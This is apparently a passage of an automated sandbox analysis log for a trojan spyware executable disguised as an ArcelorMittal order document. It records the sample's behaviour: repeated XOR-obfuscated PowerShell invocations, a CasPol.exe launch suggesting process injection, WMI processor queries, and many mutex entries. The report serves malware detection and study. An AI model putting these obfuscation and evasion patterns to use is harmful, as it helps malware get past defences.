            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BFC -bxor 677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C2A6B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x757367D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3332389F -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x43616EC9 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F63438D -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BFC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeJump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_0040327D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040327D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile created: C:\Users\user\AppData\Local\Temp\nswC988.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@215/6@1/2
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00402095 CoCreateInstance,1_2_00402095
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00404591 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3400:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3400:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3188:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:304:WilStaging_02
